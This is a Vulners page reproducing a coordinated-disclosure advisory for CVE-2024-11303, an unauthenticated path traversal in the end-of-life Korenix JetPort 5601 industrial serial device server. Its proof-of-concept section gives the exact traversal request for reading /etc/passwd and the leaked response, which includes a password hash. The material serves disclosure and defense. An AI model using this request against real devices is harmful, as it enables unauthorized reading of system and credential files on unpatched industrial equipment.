Vulners
Lucene search
Korenix JetPort 5601 1.2 Path Traversal Vulnerability
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2024-11303 | 18 Nov 202413:36 | – | circl |
 | Korenix JetPort 5601 路径遍历漏洞 | 18 Nov 202400:00 | – | cnnvd |
 | CVE-2024-11303 | 18 Nov 202413:24 | – | cve |
 | CVE-2024-11303 Path Traversal | 18 Nov 202413:24 | – | cvelist |
 | EUVD-2024-33715 | 3 Oct 202520:07 | – | euvd |
 | Korenix JetPort 5601v3 - Path Traversal | 8 Jun 202604:09 | – | nuclei |
 | CVE-2024-11303 | 18 Nov 202414:15 | – | nvd |
 | Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check | 18 Apr 201700:00 | – | openvas |
 | Korenix JetPort 5601 1.2 Path Traversal | 22 Nov 202400:00 | – | packetstorm |
 | PT-2024-16895 · Korenix · Korenix Jetport 5601 | 18 Nov 202400:00 | – | ptsecurity |
10
-------------------------------------------------------------------------------
title| Path Traversal
product| Korenix JetPort 5601
vulnerable version| 1.2
fixed version| -
CVE number| CVE-2024-11303
impact| High
homepage| https://www.korenix.com/
found| 2024-05-24
by| P. Oberndorfer, B. Tösch, M. Narbeshuber-Spletzer,
| C. Hierzer, M. Pammer
| These vulnerabilities were discovery during research at
| St.Pölten UAS, supported and coordinated by CyberDanube.
|
| https://fhstp.ac.at | https://cyberdanube.com
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
"Korenix Technology, a Beijer group company within the Industrial Communication
business area, is a global leading manufacturer providing innovative, market-
oriented, value-focused Industrial Wired and Wireless Networking Solutions.
With decades of experiences in the industry, we have developed various product
lines [...].
Our products are mainly applied in SMART industries: Surveillance, Machine-to-
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer
base covers different Sales channels, including end-customers, OEMs, system
integrators, and brand label partners. [...]"
Source: https://www.korenix.com/en/about/index.aspx?kind=3
Vulnerable versions
-------------------------------------------------------------------------------
Korenix JetPort 5601v3 / v1.2
Vulnerability overview
-------------------------------------------------------------------------------
1) Path Traversal (CVE-2024-11303)
A path traversal attack for unauthenticated users is possible. This allows
getting access to the operating system of the device and access information
like configuration files and connections to other hosts or potentially other
sensitive information.
Proof of Concept
-------------------------------------------------------------------------------
1) Path Traversal (CVE-2024-11303)
By sending the following request to the following endpoint, a path traversal
vulnerability can be triggered:
-------------------------------------------------------------------------------
GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 10.69.10.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Te: trailers
Connection: keep-alive
-------------------------------------------------------------------------------
Note, that this is only possible when an interceptor proxy or a command line
tool is used. A web browser would encode the characters and the path traversal
would not work.
The response to the latter request is shown below:
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
Server: thttpd/2.19-MX Jun 2 2022
Content-type: text/plain; charset=iso-8859-1
[...]
Accept-Ranges: bytes
Connection: Keep-Alive
Content-length: 86
root::0:0:root:/root:/bin/false
admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true
-------------------------------------------------------------------------------
The vulnerabilities were manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
Solution
-------------------------------------------------------------------------------
None. Device is End-of-Life.
Workaround
-------------------------------------------------------------------------------
Limit the access to the device and place it within a segmented network.
Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends Korenix customers to upgrade to another device.
Contact Timeline
-------------------------------------------------------------------------------
2024-09-23: Contacting Beijer Electronics Group via [email protected].
2024-09-24: Vendor stated, that the device is end-of-life. Contact will ask the
engineering team if there are any changes.
2024-10-15: Vendor stated, that the advisory can be published. No further
updates are planned for this device.
2024-11-18: Coordinated disclosure of advisory.
Web: https://www.fhstp.ac.at/
Twitter: https://x.com/fh_stpoelten
Mail: [email protected]
EOF T. Weber / @2024
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Nov 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 48.7
EPSS0.14923
SSVC